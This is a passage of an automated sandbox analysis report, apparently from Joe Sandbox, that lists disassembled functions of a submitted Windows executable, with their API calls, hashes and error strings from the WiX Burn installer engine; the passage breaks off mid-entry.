                                                                                                                                                                  • String ID: Failed to allocate string bigger for enum registry key.$Failed to allocate string to minimum size.$Failed to determine length of string.$Failed to enum registry key.$Failed to get max size of subkey name under registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 73471667-3057206726
                                                                                                                                                                  • Opcode ID: 9504ac22eebb64bb7dccc26a5d5f7033a25e5babe7deed380fc110926d32187a
                                                                                                                                                                  • Instruction ID: 4a1ac32c2dde02631d4b9181b603dea8235323761bd33163066ceb9f215a43f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 9504ac22eebb64bb7dccc26a5d5f7033a25e5babe7deed380fc110926d32187a
                                                                                                                                                                  • Instruction Fuzzy Hash: A8410BB6600228BBEB11DB95CC49FBF7AADEFCA710F114055B645EB280E9709D4197A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,00000000,?,00000000,?,00000000,7FFFFFFF,?,00000000,7FFFFFFF,?,00000000,?,00000005,00000000), ref: 009722B9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to canonicalize the directory.$Failed to canonicalize the path.$Failed to get length of canonicalized directory.$Failed to get length of canonicalized path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp$wzDirectory is required.$wzDirectory must be a fully qualified path.$wzPath is required.
                                                                                                                                                                  • API String ID: 1825529933-3471778437
                                                                                                                                                                  • Opcode ID: c3f5eb5cfcbe262b70ebc57193650d38e750ee5d4529de49718b58ffbb924ed0
                                                                                                                                                                  • Instruction ID: bf3ea66bc6b7bab6c71559aea9a580ee2b5cc175821ab2803111b9c2c15e4dd8
                                                                                                                                                                  • Opcode Fuzzy Hash: c3f5eb5cfcbe262b70ebc57193650d38e750ee5d4529de49718b58ffbb924ed0
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F412932B90719B7EB205B908C8AFEF66AC9F95F44F118125B718BE1C1E7F49E409690
                                                                                                                                                                  APIs
                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0093D55B
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0093D56A
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 0093D57E
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0093D58E
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0093D59E
                                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 0093D612
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0093D675
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0093D6EE
                                                                                                                                                                  Strings
                                                                                                                                                                  • =======================================, xrefs: 0093D63E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuitSleep
                                                                                                                                                                  • String ID: =======================================
                                                                                                                                                                  • API String ID: 305784972-300222271
                                                                                                                                                                  • Opcode ID: 141a9b59c344e0060d77e79ce77fc9f47be98bd54b58b855ee9c4d42f3c21364
                                                                                                                                                                  • Instruction ID: 470f940ee987cb43d35d3a330381d559f59217cc4c546c02a9d6c288dc9fb7e4
                                                                                                                                                                  • Opcode Fuzzy Hash: 141a9b59c344e0060d77e79ce77fc9f47be98bd54b58b855ee9c4d42f3c21364
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C516872505124FBCB11AFA8EC5AF6E3B6DEF84308F054154F92EBB161DB358D009EA5
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to find variable.$Failed to format variable '%ls' for condition '%ls'$Failed to get if variable is hidden.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$Failed to store formatted value for variable '%ls' for condition '%ls'$d:\a\wix4\wix4\src\burn\engine\condition.cpp$feclient.dll
                                                                                                                                                                  • API String ID: 2001391462-821846985
                                                                                                                                                                  • Opcode ID: ddb19a163e902bdb774844fefbacd6cf16946c5040295653bf152da3fd6a2730
                                                                                                                                                                  • Instruction ID: bac900645bf76d6ebb82f4523c9e82c8fb259bf716dbdb867785e85f867b4ab7
                                                                                                                                                                  • Opcode Fuzzy Hash: ddb19a163e902bdb774844fefbacd6cf16946c5040295653bf152da3fd6a2730
                                                                                                                                                                  • Instruction Fuzzy Hash: B9412632781218B7EF222A54CC4AFEB39789B89B14F014515FA10BE291D2B1DD9187E1
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,00916CF2,00000000,?,?,?,0094A0C7,00000000,00916CF2,00000000,00000000,00000000), ref: 0094A123
• GetLastError.KERNEL32(?,?,?,0094A0C7,00000000,00916CF2,00000000,00000000,00000000,?,0094C452,00000000,00000000,00000000,00000000,00000000), ref: 0094A133
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CreateErrorEventLast
• String ID: Failed to append cache action.$Failed to append checkpoint before package start action.$Failed to append rollback cache action.$Failed to create syncpoint event.$Failed to plan cache for package.$Failed to plan package cache syncpoint$d:\a\wix4\wix4\src\burn\engine\plan.cpp
• API String ID: 545576003-3436273000
APIs
• LocalFree.KERNEL32(00000000,00000000,00000001,80000005,00000000,00000000,00000000,00000000,00000003,000007D0), ref: 0092D752
Strings
• Failed to allocate access for Everyone group to path: %ls, xrefs: 0092D661
• Failed to allocate access for SYSTEM group to path: %ls, xrefs: 0092D633
• Failed to allocate access for Users group to path: %ls, xrefs: 0092D68F
• Failed to create ACL to secure cache path: %ls, xrefs: 0092D6E8
• Failed to allocate access for Administrators group to path: %ls, xrefs: 0092D605
• d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092D6DD, 0092D736
• Failed to secure cache path: %ls, xrefs: 0092D724
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FreeLocal
• String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
• API String ID: 2826327444-3214910189
APIs
• GetFullPathNameW.KERNEL32(00000000,00000105,?,0100147D,?,00000105,00000000,00000000,0100147D,?,00000000,00916570), ref: 0091470D
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FullNamePath
• String ID: Failed to allocate space for full path.$Failed to get current directory.$Failed to get full path for string: %ls$Failed to get max length of input buffer.$Failed to reallocate space for full path.$GetFullPathNameW results never converged.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
• API String ID: 608056474-2352071517
Strings
• Failed to initialize file search., xrefs: 00920671
• Directory search: %ls, failed get to directory attributes. '%ls', xrefs: 00920703
• Failed to set variable., xrefs: 00920761
• Directory search: %ls, did not find path: %ls, xrefs: 00920725
• Directory search: %ls, found file at path: %ls, xrefs: 00920741
• Failed to format variable string., xrefs: 0092069E
• d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 009206F3, 009206F8, 00920715, 00920773
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID:
• String ID: Directory search: %ls, did not find path: %ls$Directory search: %ls, failed get to directory attributes. '%ls'$Directory search: %ls, found file at path: %ls$Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$d:\a\wix4\wix4\src\burn\engine\search.cpp
• API String ID: 0-1139486771
Strings
• Failed to initialize file search., xrefs: 00920900
• File search: %ls, failed get to file attributes. '%ls', xrefs: 00920992
• Failed to set variable., xrefs: 009209F0
• File search: %ls, did not find path: %ls, xrefs: 009209B4
• File search: %ls, found directory at path: %ls, xrefs: 009209D0
• Failed to format variable string., xrefs: 0092092D
• d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 00920982, 00920987, 009209A4, 00920A02
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID:
• String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$File search: %ls, did not find path: %ls$File search: %ls, failed get to file attributes. '%ls'$File search: %ls, found directory at path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
• API String ID: 0-1703314674
APIs
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0096BA8E
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0096BA98
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0096BAF7
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0096BB09
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseHandle$CreateErrorLastProcess
• String ID: "%ls" %ls$D$Failed to allocate full command-line.$Failed to create process: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
• API String ID: 161867955-4079655274
                                                                                                                                                                  • Opcode ID: 92b858909cd5ae794be361308b4641899f7d124d9ce7fad8f681c0d4d4bc6c5f
                                                                                                                                                                  • Instruction ID: 915befaebb2f38dd15c3164b212ef93d267247a17372a403a11675018eb439cd
                                                                                                                                                                  • Opcode Fuzzy Hash: 92b858909cd5ae794be361308b4641899f7d124d9ce7fad8f681c0d4d4bc6c5f
                                                                                                                                                                  • Instruction Fuzzy Hash: 75314D76A01219BBEB119FE4CD45FEEBAB8AB44744F100425FA04F6290E3748E94DBA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000008,?,00000000,00000000,?,?), ref: 0092A0C3
                                                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000), ref: 0092A0CA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to format session id as a string., xrefs: 0092A0F2
                                                                                                                                                                  • Failed to copy temp folder., xrefs: 0092A171
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\logging.cpp, xrefs: 0092A183
                                                                                                                                                                  • Failed to get temp folder., xrefs: 0092A0A8
                                                                                                                                                                  • Failed to get length of session id string., xrefs: 0092A11D
                                                                                                                                                                  • %u\, xrefs: 0092A0DE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentSession
                                                                                                                                                                  • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get temp folder.$d:\a\wix4\wix4\src\burn\engine\logging.cpp
                                                                                                                                                                  • API String ID: 2701954971-2959569260
                                                                                                                                                                  • Opcode ID: eed376b67f788d8caf4c839592a603e43134aac7a5c2a0bc5355499a397ecb48
                                                                                                                                                                  • Instruction ID: 63fddc7cc811d3ac6860ba0f33deda85c0f5d70cd49307abd12c8664e7d1a128
                                                                                                                                                                  • Opcode Fuzzy Hash: eed376b67f788d8caf4c839592a603e43134aac7a5c2a0bc5355499a397ecb48
                                                                                                                                                                  • Instruction Fuzzy Hash: E731E872E44229BBCF11EB94DC06EDFBBBCEF45760F100151F904B6286D6709A50CB91
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000001,?,?,00917C8C), ref: 0096B6F1
                                                                                                                                                                    • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                    • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 0096B687
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00917C8C,?,?,?,?,?,?,?), ref: 0096B693
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                                  • String ID: Failed to load ntdll.dll$Failed to load ntdll.dll.$Failed to locate RtlGetVersion.$RtlGetVersion$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp$ntdll.dll
                                                                                                                                                                  • API String ID: 1529210728-3252241749
                                                                                                                                                                  • Opcode ID: 37cb1fabf00a58272b3a6db7eac139d824695d0a56874d0727e32a3a26a1ac2c
                                                                                                                                                                  • Instruction ID: b440fe9159f6aff6245b79930cbcca8e375dbd9766519963fb552970643bb613
                                                                                                                                                                  • Opcode Fuzzy Hash: 37cb1fabf00a58272b3a6db7eac139d824695d0a56874d0727e32a3a26a1ac2c
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D212972B40325B7E3205A90CC8AFAE35AC9B9BB38F100036B705FA196F7B54D8052E4
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 00918B61
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3535843008-118609244
                                                                                                                                                                  • Opcode ID: 5f5df5de2da41adc09d9c5eb8921f765ed8fc67c702eca07f820571a73eb8723
                                                                                                                                                                  • Instruction ID: 29687b7274837a0bccbda3dd831794f4c00efeb42e49244a479ac62fd0f1c2a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f5df5de2da41adc09d9c5eb8921f765ed8fc67c702eca07f820571a73eb8723
                                                                                                                                                                  • Instruction Fuzzy Hash: 36112972FC4328B6EB21B6448C0FFDF69689F90B51F100111FA04BA2C29AF08A80E690
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,00000000,009115E3,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113ED
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113F9
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00911444
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00911455
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorHandleLastModule
                                                                                                                                                                  • String ID: Failed to get module handle for kernel32.$SetDefaultDllDirectories$SetDllDirectoryW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp$kernel32
                                                                                                                                                                  • API String ID: 3392887714-1639946792
                                                                                                                                                                  • Opcode ID: 38175133ce1b25ff23387d496ebcac1a1106c31cc826ac794c8d683ca164947e
                                                                                                                                                                  • Instruction ID: cdee289f5bd6fe99907a2b367fc9d04941badce1b283ec136b1fc1b80ae57dc4
                                                                                                                                                                  • Opcode Fuzzy Hash: 38175133ce1b25ff23387d496ebcac1a1106c31cc826ac794c8d683ca164947e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8501F277B6663437D37117246C0EBDB29589F8AB25F014195FA08BB1E1E6A0488096E0
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,?), ref: 00954A38
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 00954C1C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set download password., xrefs: 00954B99
                                                                                                                                                                  • BA requested unknown payload with id: %ls, xrefs: 00954A9B
                                                                                                                                                                  • BA did not provide container or payload id., xrefs: 00954BF4
                                                                                                                                                                  • Failed to set download URL., xrefs: 00954B31
                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 00954A50
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\externalengine.cpp, xrefs: 00954A62, 00954AF5, 00954C0B
                                                                                                                                                                  • BA requested unknown container with id: %ls, xrefs: 00954AE3
                                                                                                                                                                  • Failed to set download user., xrefs: 00954B65
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: BA did not provide container or payload id.$BA requested unknown container with id: %ls$BA requested unknown payload with id: %ls$Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                  • API String ID: 3168844106-103459661
                                                                                                                                                                  • Opcode ID: e5f0cc7d193d0e2419ce236d35e496b8d6ed5dcd974c384f731a77d23e39db26
                                                                                                                                                                  • Instruction ID: 9e8979eee0705d097ff77644f6afe6c21d835e5b5291bb3e5aeeada8456efd1b
                                                                                                                                                                  • Opcode Fuzzy Hash: e5f0cc7d193d0e2419ce236d35e496b8d6ed5dcd974c384f731a77d23e39db26
                                                                                                                                                                  • Instruction Fuzzy Hash: 07512671B8020ABBDB61DB56CC46FDA76ACAF8070AF154121BD04AB1C1E3B0D9D4C7E1
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,-80000001,56800040,00020019,00000001,00916EDE,00916DEA,00000000,00916E32,00916EDE,00917162,00916DEA), ref: 00942362
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\exeengine.cpp, xrefs: 00942238, 0094234C
                                                                                                                                                                  • DisplayVersion, xrefs: 00942256
                                                                                                                                                                  • QuietUninstallString, xrefs: 00942315
                                                                                                                                                                  • Failed to compare versions., xrefs: 009422DC
                                                                                                                                                                  • Failed to read DisplayVersion., xrefs: 00942282
                                                                                                                                                                  • Failed to read QuietUninstallString., xrefs: 0094233A
                                                                                                                                                                  • Failed to open registry key: %ls., xrefs: 00942226
                                                                                                                                                                  Memory Dump Source
